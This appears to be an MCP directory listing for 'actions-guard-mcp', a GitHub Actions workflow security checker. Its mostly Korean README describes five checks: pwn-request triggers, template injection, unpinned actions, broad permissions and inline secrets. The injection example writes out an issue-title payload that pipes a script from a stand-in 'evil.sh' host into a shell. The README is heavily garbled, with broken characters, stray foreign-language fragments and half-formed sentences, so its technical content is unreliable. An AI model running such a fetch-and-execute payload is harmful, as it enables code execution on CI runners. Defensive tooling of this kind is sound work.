actions-guard-mcp
actions-guard-mcp
GitHub Actions의 워크플로우 보안 스, MCP 도구의 형태로 노출됩니다. 즉, 에이전트가 워크플로우 파일을 커밋한 후에가 아니라 커밋하기 전에 실제 사고CoreShop, tj-actions 등)로 이이진 "pwn request" 및 공급망 패턴을 잡을 수 있습니다.
존재 이유
GitHub Actions 워크플로우에 대한 정적 분석은 성숙와 있고, 잘 이해도는 분야와. zizmor은 정확을 이를 위해 정확을 이위한, 존중받고 활발히 유지도는 실제 스너입니다. 아직 만들지지 않은 것은 해당 분석 계열을 감싸는 넉진한 MCP 큽퍼입니다. 광범위한 검색에서 확인된 유일의 프로젝트(github-security-mcp)는 45개 검사를 조직 설정, 시크릿, 공급망, 그리고 Actions에 걸쳐 하나의 일반적 도구에 나将一个 도구 with one, n stars, no commit 5 month. 별 12개에 커밋이 5개월 없음. 에이전트가 워크플로우를 작은 작성거나 검토하는 동안, 워크플로우 보안에 특히존중하고 깊이 있는 무언가로서의 도구는 없습니다.
Related MCP server: vibecheck
잡아내는 것
위험한 트리거 (AGMCP-101) — pull_request_target 또는 workflow_run이, ref: 또는 repository:가 트리거한 PR/실행의 자체 포크를 가리키는 체크아웃 단계와 결합된 경우. 이고 CoreShop 사고 형상의 정확한 형태가, 확실: 기본 리포지토리의 토큆과 시크릿를 시용하는 데지만 커밋하한을 체크아웃하고 코드를 실행시키는 워크플로우.
템플릿 인젝트 (AGMCP-102) — 공격자 통제 컨텍스트(github.event.issue.title, github.event.pull_request.title, github.event.comment.body, github.head_ref, toJSON(github.event) 전체 페이로드 덥프 등)에서 만들어 진 ${{ ... }} 표현이 env:을 통과하지 않고 run: 스텝에 직접 삽입되는 형태. 전형적인 형테은 run: echo "${{ github.event.issue.title }}" — 이슈 제목으로 " " curl -f -f evil.sh | sh #가 올면, 그 시점에서 문자열이 아니라 스ീ립트. ??
No, "쉐" will be.
고정되지 않은 액션/재사용 워크플로 (AGMCP-103) — 커밋 SHA로 고정하지 않고 owner/repo@v4(신 가능한 태그/브랜치)를 사용하거나, 작업 수준의 재사용 워크플로우 호출(jobs.<id>.uses: owner/repo/.github/workflows/x.yml@main)도 변경 가능한 방식로 고정되지 못하거나, docker://image:tag를 @sha256: 다이제스트로 고정하지 못한 참자. Its가이 at tj-actions 공지의 침 공급망 공격면임: 가변이 채손도는데ーター point at, used a version bump no bump, 안전된 모든.
과도한 권한 (AGMCP-104) — permissions: write-all 또 는용– spec scopes write scope (contents, actions, packages, ...) at runtime and flows.
비밀 값을 셸에 바로 집어넣는 (AGMCP-105) — ${{ secrets.X }}를 env:로 전달하지 않고 run: 스텝에서 직접 쓰는 경우, 원본 비밀 값을 환경 변수가 아닌리 엘 코자에서/프로세스 목록에 직접 제트라 불필요한 노출이 됩니다.
모든 마커 매칭 (AGMCP-101/102/105)은 GitHub Actions의 브라킷 노✨ — access API (*github[event][issue] → etc?) 문자열 수. HL.
알려진 한계
이것은 마커 매칭이 물자 그대로의 ${{ }} 표현 식과 with:/permissions: block을 면 것 — 완전한 GitHub Actions 표현식 parameter/데이터 플로 분석은 아니합니다. 클린 결과 값은 "기록한 텍스트에서 알려진 위험한 패턴이 발견되지 않았다"는 뜻이지, 어단을하지 못한다는 뜻입니다. 구체적으로:
단간/내 등 중간 전닥 /
env:흐름 추적 없음. 위험한 값에가 어떤 checkout의ref:또는run:명령에 도달하기 전에 중간env:변수 또는 스텝의 아웃품을 거치면 AGMCP-101/102/105가 보지 못합니다 — 분석 대상 자리에 있는 글자체의 표현만 확인하고, 그중에 대해서도 리적 data flow 처리 안 합니다.공격자-통제 컨텍스트의마커 목록 (AGMCP-102)은 유한정도 사용자 주지의 집합입니다. GitHub 소스는 GitHub Actions 모든 context path를 플로 전열하지 않습니다. 명확되지 않고, 아직 파일리에 없는 전더 new field있 을거나 드문 필드가 존재할 수 있습니다.
검사 결과가 보안 결정의 근거로 중요하다면 그 것이 last word로 여기지 말她 — izmor is have deeper and more general static analysis of the same file category; this is worth running alongside, not-> in case.
설정
pip install actions-guard-mcp
actions-guard-mcp구성 파일 필요 없이 각 도구에는 워크플로우 파일 파이 또는 ChaYAML 내용 Y도 마찬로 전달하면 됩니다.
상태
초기 상태.
라이선스
MIT
Maintenance
Resources
Unclaimed servers have limited discoverability.
Looking for Admin?
If you are the server author, to access and configure the admin panel.
Related MCP Servers
- AlicenseAqualityDmaintenanceAn MCP server that enables AI agents to perform comprehensive GitHub security audits across org settings, repositories, Actions workflows, secrets, supply chain, and access control using 39 tools and 45 checks.3952112MIT
- AlicenseAqualityBmaintenanceAgent-native "safe to ship?" security gate for AI-generated code. Uses real parsers and inter-rocedural taint analysis (JS/TS, Python, Go) to flag the classes AI coding agents get wrong — secrets, SQL injection, SS, SSRF, path traversal, command injection, weak JWT/CORS — and ranks findings by confidence. Exposes a scan tool over MCP.162MIT
- AlicenseAqualityAmaintenanceLocal-only GitHub Actions and CI maintenance scanner for AI-built apps. Exposes scan, explanation, and fix-planning tools to MCP clients; modifies nothing and makes no outbound requests by default.3632MIT
- AlicenseAqualityBmaintenanceVerify-before-act safety tools for AI coding agents, providing MCP tools to check packages, lockfiles, manifests, and CI workflows for supply chain risks.449MIT
Related MCP Connectors
GitHub Actions workflow security audit - 21 checks: pinning, permissions, secrets, injection.
Scans MCP servers for tool poisoning, prompt injection and supply chain risks.
Screens public GitHub repos and PRs to generate risk maps, findings, and merge-readiness signals.
Latest Blog Posts
- Who's Calling? MCP Hosts Are an Identity Blind Spot (And the Spec Knows It)By Om-Shree-0709 on .mcpAgent IdentityOAuth 2.1
- Your AI Chatbot Just Exposed Your CEO's Salary to an InternBy Om-Shree-0709 on .Agent IdentityMCP SecurityOAuth Delegation
- Why MCP Servers Need Execution Sandboxing (And Why Your Current Stack Isn't Enough)By Om-Shree-0709 on .Agentic AiPrompt InjectionWebAssembly
MCP directory API
We provide all the information about MCP servers via our MCP API.
curl -X GET 'https://glama.ai/api/mcp/v1/servers/BerkantACUN/actions-guard-mcp'
If you have feedback or need assistance with the MCP directory API, please join our Discord server